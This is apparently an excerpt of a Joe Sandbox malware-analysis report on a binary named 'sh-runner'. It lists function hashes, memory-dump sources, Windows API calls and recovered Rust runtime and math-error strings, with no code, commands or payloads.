                                                                      • Opcode ID: d58e9ce648b1a0319dfa7293510e667b9568abe884a28bd8b7690c907cebcaab
                                                                      • Instruction ID: 92478db78a73c76f264482ecf0f7b198de7bf60132a29dea159a35fec231d469
                                                                      • Opcode Fuzzy Hash: d58e9ce648b1a0319dfa7293510e667b9568abe884a28bd8b7690c907cebcaab
                                                                      • Instruction Fuzzy Hash: 2D11B132918EC581E724AF65E8003E9B370FB8CB84F501235EA8D13B69CF38D195CB10
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.3056420438.00007FF72BCD1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF72BCD0000, based on PE: true
                                                                      • Associated: 00000002.00000002.3056403973.00007FF72BCD0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056475975.00007FF72BD6C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056493448.00007FF72BD6D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056522131.00007FF72BDA5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056538929.00007FF72BDA6000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056555538.00007FF72BDA9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_7ff72bcd0000_sh-runner.jbxd
                                                                      Similarity
                                                                      • API ID: ErrorLast$ObjectSingleWait
                                                                      • String ID:
                                                                      • API String ID: 2406892700-0
                                                                      • Opcode ID: c37556abf3a020f25dde4dfb99e3e47babbb23f5179f9352ba51e197d9bd2da5
                                                                      • Instruction ID: 552ce43fc008eeaa0941128502b2c82644e38b09421e60d486672402dc324699
                                                                      • Opcode Fuzzy Hash: c37556abf3a020f25dde4dfb99e3e47babbb23f5179f9352ba51e197d9bd2da5
                                                                      • Instruction Fuzzy Hash: 41017C15F2C54699FB6CB67E5D012F98255DF68780FD40830DE0D427E6DE2CE5828A30
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.3056420438.00007FF72BCD1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF72BCD0000, based on PE: true
                                                                      • Associated: 00000002.00000002.3056403973.00007FF72BCD0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056475975.00007FF72BD6C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056493448.00007FF72BD6D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056522131.00007FF72BDA5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056538929.00007FF72BDA6000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056555538.00007FF72BDA9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_7ff72bcd0000_sh-runner.jbxd
                                                                      Similarity
                                                                      • API ID: CloseCodeErrorExitHandleLastObjectProcessSingleWait
                                                                      • String ID:
                                                                      • API String ID: 2321548817-0
                                                                      • Opcode ID: a28bc2daecc7b087ba31efa09389819d5da8d887621205d0725bce4dca8923a9
                                                                      • Instruction ID: 6e9b6173325fdd1796beceb9196f1ae981b684ae8ba930cca05afed9766c7626
                                                                      • Opcode Fuzzy Hash: a28bc2daecc7b087ba31efa09389819d5da8d887621205d0725bce4dca8923a9
                                                                      • Instruction Fuzzy Hash: 15017572B1464196F758EA6DE9003E9A390EB48780F549030DF5C837D5DF3CD591C720
                                                                      APIs
                                                                      • WakeByAddressSingle.API-MS-WIN-CORE-SYNCH-L1-2-0(?,?,?,?,?,?,?,?,?,?,?,00007FF72BCFF267), ref: 00007FF72BCFF6DE
                                                                      • WakeByAddressSingle.API-MS-WIN-CORE-SYNCH-L1-2-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF72BCFF267), ref: 00007FF72BCFF7E9
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.3056420438.00007FF72BCD1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF72BCD0000, based on PE: true
                                                                      • Associated: 00000002.00000002.3056403973.00007FF72BCD0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056475975.00007FF72BD6C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056493448.00007FF72BD6D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056522131.00007FF72BDA5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056538929.00007FF72BDA6000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056555538.00007FF72BDA9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_7ff72bcd0000_sh-runner.jbxd
                                                                      Similarity
                                                                      • API ID: AddressSingleWake
                                                                      • String ID: lock count overflow in reentrant mutexstd\src\sync\reentrant_lock.rs
                                                                      • API String ID: 3114109732-1515065283
                                                                      • Opcode ID: 6574a8f12a73f2ae729c440015dedf44f8c184b49fbe50fa14d34e0f80832e44
                                                                      • Instruction ID: 10ad0c19a3b2aab6ff49a74408b2d71f7ca16ec8508fbec10bb6eea3a3355c18
                                                                      • Opcode Fuzzy Hash: 6574a8f12a73f2ae729c440015dedf44f8c184b49fbe50fa14d34e0f80832e44
                                                                      • Instruction Fuzzy Hash: 98519822A0958246E628BB1DEC543B9E750EB41794F948132D79E437F1DF3CF4868B20
                                                                      APIs
                                                                      Strings
                                                                      • assertion failed: len >= mem::size_of::<c::sockaddr_in>()std\src\sys_common\net.rs, xrefs: 00007FF72BD14E1E
                                                                      • assertion failed: len >= mem::size_of::<c::sockaddr_in6>(), xrefs: 00007FF72BD14E36
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.3056420438.00007FF72BCD1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF72BCD0000, based on PE: true
                                                                      • Associated: 00000002.00000002.3056403973.00007FF72BCD0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056475975.00007FF72BD6C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056493448.00007FF72BD6D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056522131.00007FF72BDA5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056538929.00007FF72BDA6000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056555538.00007FF72BDA9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_7ff72bcd0000_sh-runner.jbxd
                                                                      Similarity
                                                                      • API ID: ErrorLast
                                                                      • String ID: assertion failed: len >= mem::size_of::<c::sockaddr_in6>()$assertion failed: len >= mem::size_of::<c::sockaddr_in>()std\src\sys_common\net.rs
                                                                      • API String ID: 1452528299-3544120690
                                                                      • Opcode ID: c3911f9b81918587c0b4cb388ab499344e0613332c6cfb78e9a4b96b604dde71
                                                                      • Instruction ID: 64e81062b8ea1bc470168925edf25ef2c931131e39bb9870ae3cbde7dbd6779d
                                                                      • Opcode Fuzzy Hash: c3911f9b81918587c0b4cb388ab499344e0613332c6cfb78e9a4b96b604dde71
                                                                      • Instruction Fuzzy Hash: 2751E032A145918AF778AF69E8412FDB3B0FB44358F549139EE9D03AA4DE3CA581CF10
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.3056420438.00007FF72BCD1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF72BCD0000, based on PE: true
                                                                      • Associated: 00000002.00000002.3056403973.00007FF72BCD0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056475975.00007FF72BD6C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056493448.00007FF72BD6D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056522131.00007FF72BDA5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056538929.00007FF72BDA6000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056555538.00007FF72BDA9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_7ff72bcd0000_sh-runner.jbxd
                                                                      Similarity
                                                                      • API ID: Startupmemset
                                                                      • String ID: main
                                                                      • API String ID: 1873301828-3207122276
                                                                      • Opcode ID: 5e7a4f44316e32eaf9dee5cd7f25c5174312c24d9c81cd2afdbdf35aa7c482f0
                                                                      • Instruction ID: c3345c4dcedc120f3ca31c98474a569dddc491aad78624a71e6d6f01f2ad9850
                                                                      • Opcode Fuzzy Hash: 5e7a4f44316e32eaf9dee5cd7f25c5174312c24d9c81cd2afdbdf35aa7c482f0
                                                                      • Instruction Fuzzy Hash: 2F419326A04A4385EB65AF1DEC457EAA364FB88B84FC48031DE4D473A5DF3CE586C760
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.3056420438.00007FF72BCD1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF72BCD0000, based on PE: true
                                                                      • Associated: 00000002.00000002.3056403973.00007FF72BCD0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056475975.00007FF72BD6C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056493448.00007FF72BD6D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056522131.00007FF72BDA5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056538929.00007FF72BDA6000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056555538.00007FF72BDA9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_7ff72bcd0000_sh-runner.jbxd
                                                                      Similarity
                                                                      • API ID: CloseEnvironmentFreeHandleStrings
                                                                      • String ID: program path has no file name
                                                                      • API String ID: 2431795302-697003637
                                                                      • Opcode ID: bb33e71a8487094f8f3af150614d1764cca13a237b3b36ed40153029343f014f
                                                                      • Instruction ID: ad14ddc1da3bb19fd883d82a152cd29766653af014463b768cd78bb0ffeec67b
                                                                      • Opcode Fuzzy Hash: bb33e71a8487094f8f3af150614d1764cca13a237b3b36ed40153029343f014f
                                                                      • Instruction Fuzzy Hash: FD319662B1864241EF18BB6A9C002F99750FF85BC4FC85836DD0D4B7A6DE3DE581CB20
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.3056420438.00007FF72BCD1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF72BCD0000, based on PE: true
                                                                      • Associated: 00000002.00000002.3056403973.00007FF72BCD0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056475975.00007FF72BD6C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056493448.00007FF72BD6D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056522131.00007FF72BDA5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056538929.00007FF72BDA6000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056555538.00007FF72BDA9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_7ff72bcd0000_sh-runner.jbxd
                                                                      Similarity
                                                                      • API ID: CloseEnvironmentFreeHandleStrings
                                                                      • String ID: program path has no file name
                                                                      • API String ID: 2431795302-697003637
                                                                      • Opcode ID: 26d9d0ab86754a4c96a9833d086fb707cbd07cccffc104ef706268925d4f66c9
                                                                      • Instruction ID: bcddd374341bc3bfeab35e295799cfc2d8368908a446caa7c3a76e6b4c166e66
                                                                      • Opcode Fuzzy Hash: 26d9d0ab86754a4c96a9833d086fb707cbd07cccffc104ef706268925d4f66c9
                                                                      • Instruction Fuzzy Hash: FD319662A1854191EF28BB6A9C002F99350FF85BD4FC81836DE0D4B766DE39E541CB20
                                                                      APIs
                                                                      • QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,00007FF72BD0AB68,?,?,?,?,?,?,00007FF72BCF4D36), ref: 00007FF72BD1E195
                                                                      • GetLastError.KERNEL32(?,?,?,?,?,?,00007FF72BD0AB68,?,?,?,?,?,?,00007FF72BCF4D36), ref: 00007FF72BD1E230
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.3056420438.00007FF72BCD1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF72BCD0000, based on PE: true
                                                                      • Associated: 00000002.00000002.3056403973.00007FF72BCD0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056475975.00007FF72BD6C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056493448.00007FF72BD6D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056522131.00007FF72BDA5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056538929.00007FF72BDA6000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056555538.00007FF72BDA9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_7ff72bcd0000_sh-runner.jbxd
                                                                      Similarity
                                                                      • API ID: ErrorFrequencyLastPerformanceQuery
                                                                      • String ID: called `Result::unwrap()` on an `Err` value
                                                                      • API String ID: 3362413890-2333694755
                                                                      • Opcode ID: d989155210a2c77213bae5babb0edb5687693b73d0462da1ae5999daa73c0dd9
                                                                      • Instruction ID: 8f29ef029ecf20d0cff312ab6e48adf385c8cc9c3e1838dc7d933c7b00d7f180
                                                                      • Opcode Fuzzy Hash: d989155210a2c77213bae5babb0edb5687693b73d0462da1ae5999daa73c0dd9
                                                                      • Instruction Fuzzy Hash: A431C411B19B4643EB0CBB7DAC152F9A751DF88B80F849036CD4E077A5DE2CA5418B60
                                                                      APIs
                                                                      • WakeByAddressSingle.API-MS-WIN-CORE-SYNCH-L1-2-0(?,?,?,?,00007FF72BD0DB02), ref: 00007FF72BD21D4C
                                                                      • TlsSetValue.KERNEL32(?,?,?,?,?,?,?,?,00007FF72BD0DB02), ref: 00007FF72BD21DA9
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.3056420438.00007FF72BCD1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF72BCD0000, based on PE: true
                                                                      • Associated: 00000002.00000002.3056403973.00007FF72BCD0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056475975.00007FF72BD6C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056493448.00007FF72BD6D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056522131.00007FF72BDA5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056538929.00007FF72BDA6000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056555538.00007FF72BDA9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_7ff72bcd0000_sh-runner.jbxd
                                                                      Similarity
                                                                      • API ID: AddressSingleValueWake
                                                                      • String ID: assertion failed: is_unlocked(state)
                                                                      • API String ID: 741412973-3502192491
                                                                      • Opcode ID: 23bfee41d53f48bfe86db273fd7076ee8176e7753bdf13d3cd2adad824054417
                                                                      • Instruction ID: 8c623b18387bbe39a4634a9a16d96beb92f2d23cfeaf07bfc7db6500733735d4
                                                                      • Opcode Fuzzy Hash: 23bfee41d53f48bfe86db273fd7076ee8176e7753bdf13d3cd2adad824054417
                                                                      • Instruction Fuzzy Hash: F4217421F0A4968BF72E665DAC003F99151DFD8759FA4C034DE0D472A5DD2DA9C38B90
                                                                      APIs
                                                                      Strings
                                                                      • assertion failed: socket != sys::c::INVALID_SOCKET as RawSocketstd\src\os\windows\io\socket.rs, xrefs: 00007FF72BD14A77
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.3056420438.00007FF72BCD1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF72BCD0000, based on PE: true
                                                                      • Associated: 00000002.00000002.3056403973.00007FF72BCD0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056475975.00007FF72BD6C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056493448.00007FF72BD6D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056522131.00007FF72BDA5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056538929.00007FF72BDA6000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056555538.00007FF72BDA9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_7ff72bcd0000_sh-runner.jbxd
                                                                      Similarity
                                                                      • API ID: Socketmemsetrecv
                                                                      • String ID: assertion failed: socket != sys::c::INVALID_SOCKET as RawSocketstd\src\os\windows\io\socket.rs
                                                                      • API String ID: 1952720251-765684447
                                                                      • Opcode ID: c87d3782ade94329c49124aaa88e3021b04a82a06ab70fd5b34bbb251caef58b
                                                                      • Instruction ID: 6920cb5fd5183971737b56a7277018d2fbc4ca51c7b3098725b4d3e6c4c7318a
                                                                      • Opcode Fuzzy Hash: c87d3782ade94329c49124aaa88e3021b04a82a06ab70fd5b34bbb251caef58b
                                                                      • Instruction Fuzzy Hash: F601F921B5998289FB28727DA8413F99251DB84738FA85331D97D467F0DE2CF5818E24
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.3056420438.00007FF72BCD1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF72BCD0000, based on PE: true
                                                                      • Associated: 00000002.00000002.3056403973.00007FF72BCD0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056475975.00007FF72BD6C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056493448.00007FF72BD6D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056522131.00007FF72BDA5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056538929.00007FF72BDA6000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056555538.00007FF72BDA9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_7ff72bcd0000_sh-runner.jbxd
                                                                      Similarity
                                                                      • API ID: fprintf
                                                                      • String ID: Unknown error$_matherr(): %s in %s(%g, %g) (retval=%g)
                                                                      • API String ID: 383729395-3474627141
                                                                      • Opcode ID: 9f23c45abf64fbacbe6a0a0f21fe03d62fd103c67be2481a929507254058cce8
                                                                      • Instruction ID: 88b908502baf5943e6fe98acef9b5dc32673661de24a6f86c2e669a285bf7b6d
                                                                      • Opcode Fuzzy Hash: 9f23c45abf64fbacbe6a0a0f21fe03d62fd103c67be2481a929507254058cce8
                                                                      • Instruction Fuzzy Hash: 0E017062D0CF8582D605AF1CAC011FAB320FB5E749F559335EA8C26125DF28E682CB10
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.3056420438.00007FF72BCD1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF72BCD0000, based on PE: true
                                                                      • Associated: 00000002.00000002.3056403973.00007FF72BCD0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056475975.00007FF72BD6C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056493448.00007FF72BD6D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056522131.00007FF72BDA5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056538929.00007FF72BDA6000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056555538.00007FF72BDA9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_7ff72bcd0000_sh-runner.jbxd
                                                                      Similarity
                                                                      • API ID: fprintf
                                                                      • String ID: The result is too small to be represented (UNDERFLOW)$_matherr(): %s in %s(%g, %g) (retval=%g)
                                                                      • API String ID: 383729395-2187435201
                                                                      • Opcode ID: d47faca273fee3eb08652286ba7156c53cd7e91152ecfc3982f4c63b94e46008
                                                                      • Instruction ID: c0dbf88ed3d24cceb64ee2d5002c5eef37e9a1f866f625d264c3fe4e7fd461c8
                                                                      • Opcode Fuzzy Hash: d47faca273fee3eb08652286ba7156c53cd7e91152ecfc3982f4c63b94e46008
                                                                      • Instruction Fuzzy Hash: F4F06256D08E8882D206AF2CA8010EBB330FF4D788F545335EE8D26165DF28E682CB10
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.3056420438.00007FF72BCD1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF72BCD0000, based on PE: true
                                                                      • Associated: 00000002.00000002.3056403973.00007FF72BCD0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056475975.00007FF72BD6C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056493448.00007FF72BD6D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056522131.00007FF72BDA5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056538929.00007FF72BDA6000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056555538.00007FF72BDA9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_7ff72bcd0000_sh-runner.jbxd
                                                                      Similarity
                                                                      • API ID: fprintf
                                                                      • String ID: Total loss of significance (TLOSS)$_matherr(): %s in %s(%g, %g) (retval=%g)
                                                                      • API String ID: 383729395-4273532761
                                                                      • Opcode ID: 654fe18368314048296bdca04a1506cf58bf7ededbd10768bb3a05801da12397
                                                                      • Instruction ID: 69080ae37d980a72d9dd3ad3f8f623db6256b67226ab1e123765a8c303624482
                                                                      • Opcode Fuzzy Hash: 654fe18368314048296bdca04a1506cf58bf7ededbd10768bb3a05801da12397
                                                                      • Instruction Fuzzy Hash: 12F06256D08E8886D206AF2CA8010EBB330FF4D789F545336EE8D26525DF28E6828B10
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.3056420438.00007FF72BCD1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF72BCD0000, based on PE: true
                                                                      • Associated: 00000002.00000002.3056403973.00007FF72BCD0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056475975.00007FF72BD6C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056493448.00007FF72BD6D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056522131.00007FF72BDA5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056538929.00007FF72BDA6000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056555538.00007FF72BDA9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_7ff72bcd0000_sh-runner.jbxd
                                                                      Similarity
                                                                      • API ID: fprintf
                                                                      • String ID: Partial loss of significance (PLOSS)$_matherr(): %s in %s(%g, %g) (retval=%g)
                                                                      • API String ID: 383729395-4283191376
                                                                      • Opcode ID: cc15266162407a88aa47b9f831956226476d6312fc5f7b2ab81cfc402f8cf8eb
                                                                      • Instruction ID: 30518e7780b06c2b81e25abbc9ff98074cfb9ec21f9d7fc8e00df32cec419d67
                                                                      • Opcode Fuzzy Hash: cc15266162407a88aa47b9f831956226476d6312fc5f7b2ab81cfc402f8cf8eb
                                                                      • Instruction Fuzzy Hash: 40F06256D08E8882D206AF2CA8010EBB330FF5D788F545335EE8D26165DF28E6828B10
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.3056420438.00007FF72BCD1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF72BCD0000, based on PE: true
                                                                      • Associated: 00000002.00000002.3056403973.00007FF72BCD0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056475975.00007FF72BD6C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056493448.00007FF72BD6D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056522131.00007FF72BDA5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056538929.00007FF72BDA6000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056555538.00007FF72BDA9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_7ff72bcd0000_sh-runner.jbxd
                                                                      Similarity
                                                                      • API ID: fprintf
                                                                      • String ID: Overflow range error (OVERFLOW)$_matherr(): %s in %s(%g, %g) (retval=%g)
                                                                      • API String ID: 383729395-4064033741
                                                                      • Opcode ID: a3a07cbde992090d7d7b51d2974cdc157ef3de1d13c1c5e643ec34ef39ebd05a
                                                                      • Instruction ID: 7bf140a4cbc57aa3f438b7eac5fcac774e11e6423716d6b362eed024c64d6993
                                                                      • Opcode Fuzzy Hash: a3a07cbde992090d7d7b51d2974cdc157ef3de1d13c1c5e643ec34ef39ebd05a
                                                                      • Instruction Fuzzy Hash: 99F06256D08E8882D206AF2CA8010EBB330FF4D788F545335EE8D26165DF28E6828B10
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.3056420438.00007FF72BCD1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF72BCD0000, based on PE: true
                                                                      • Associated: 00000002.00000002.3056403973.00007FF72BCD0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056475975.00007FF72BD6C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056493448.00007FF72BD6D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056522131.00007FF72BDA5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056538929.00007FF72BDA6000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056555538.00007FF72BDA9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_7ff72bcd0000_sh-runner.jbxd
                                                                      Similarity
                                                                      • API ID: fprintf
                                                                      • String ID: Argument domain error (DOMAIN)$_matherr(): %s in %s(%g, %g) (retval=%g)
                                                                      • API String ID: 383729395-2713391170
                                                                      • Opcode ID: 9d7587cdb4e71efc7c1c888ce97e11677cfee7c1fcdc9252f9f345f0b25ff5e1
                                                                      • Instruction ID: cbe424f27abf4d26dd3d41b98d36361cccf678be02eab77110174ce4fe3046c6
                                                                      • Opcode Fuzzy Hash: 9d7587cdb4e71efc7c1c888ce97e11677cfee7c1fcdc9252f9f345f0b25ff5e1
                                                                      • Instruction Fuzzy Hash: 82F06256D08E8882D206AF2CA8010EBB330FF4D788F545335EE8D36165DF28E6828B10
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.3056420438.00007FF72BCD1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF72BCD0000, based on PE: true
                                                                      • Associated: 00000002.00000002.3056403973.00007FF72BCD0000.00000002.00000001.01000000.00000005.sdmpDownload File
